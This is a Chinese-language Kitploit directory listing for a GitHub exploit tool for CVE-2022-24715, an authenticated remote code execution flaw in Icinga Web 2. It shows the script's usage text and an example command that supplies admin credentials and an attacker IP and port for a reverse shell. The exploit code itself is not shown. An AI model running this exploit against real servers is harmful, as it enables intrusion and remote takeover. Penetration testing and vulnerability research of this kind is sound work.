Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-24715 — Icinga Web 2 - 认证远程代码执行 <2.8.6, <2.9.6, <2.10 | Kitploit
工具/GitHubGitHub/cxdxnt/cve-2022-24715
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubcxdxnt/cve-2022-24715

CVE-2022-24715

Icinga Web 2 - 认证远程代码执行 <2.8.6, <2.9.6, <2.10

查看仓库
3年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Icinga Web 2 - 认证远程代码执行 <2.8.6, <2.9.6, <2.10

远程命令执行

asciicast

反弹Shell

asciicast

使用方法

root@kitploit:~
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT

Welcome.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Insert URL http://ip_victima
  -U USER, --user USER  Insert user -U user
  -P PASSWORD, --password PASSWORD
                        Insert password -P password
  -i IP, --ip IP        Insert IP_ATTACK -i IP
  -p PORT, --port PORT  Insert PORT_ATTACK -p PORT

示例

root@kitploit:~
python3 exploit.py -u http://localhost -U admin  -P admin123 -i 192.168.1.1 -p 443
下载工具